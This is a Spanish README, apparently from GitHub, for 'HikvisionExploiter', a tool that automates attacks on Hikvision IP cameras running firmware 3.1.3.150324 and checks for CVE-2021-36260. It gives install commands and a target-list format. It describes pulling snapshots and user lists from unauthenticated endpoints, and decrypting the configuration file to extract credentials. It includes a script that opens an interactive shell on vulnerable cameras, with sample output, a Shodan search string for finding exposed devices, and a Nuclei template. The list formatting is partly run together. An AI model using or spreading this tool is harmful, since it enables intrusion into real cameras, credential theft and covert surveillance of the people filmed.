
HikvisionExploiter es una utilidad basada en Python diseñada para automatizar la explotación y las comprobaciones de accesibilidad de directorios en cámaras de red Hikvision, explotando la interfaz web Versión 3.1.3.150324 + Detección de CVE-2021-36260
HikvisionExploiter es un potente kit de herramientas de explotación automatizada dirigido a endpoints no autenticados en cámaras IP Hikvision, en particular las que ejecutan la versión de firmware 3.1.3.150324.
Realiza:
Diseñado para investigadores, red teamers y entusiastas de la seguridad IoT.
/onvif-http/snapshot para detectar exposición de instantáneas/System/configurationFile cifrado, lo descifra usando AES + XOR y extrae credenciales/Security/userswebLanguagelogs/ThreadPoolExecutorpip install -r requirements.txtffmpeg (opcional, para futura capacidad de convertir instantáneas a video)pycrypto (para descifrado de configuración):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
Crea un archivo targets.txt con el siguiente formato:
IP:PORT
Ejemplo:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
Esto hará lo siguiente:
logs/IP_PORT_TIMESTAMP/Para ejecutar comandos de forma interactiva en un dispositivo vulnerable:
chmod +x shell.sh
./shell.sh <ip:port>
Ejemplo:
./shell.sh 192.168.1.10:80
Si es vulnerable, entrarás en una shell interactiva:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
Usa el siguiente dork de Shodan para localizar cámaras Hikvision expuestas:
3.1.3.150324
Se incluye una plantilla compatible con Nuclei: nuclei-template.yaml
Uso:
nuclei -t nuclei-template.yaml -list targets.txt
Detecta:
MIT License ©
Consulta LICENSE para más detalles.
Telegram: @HexBuddy127001
Hecho con ❤️ solo para investigación educativa y ética.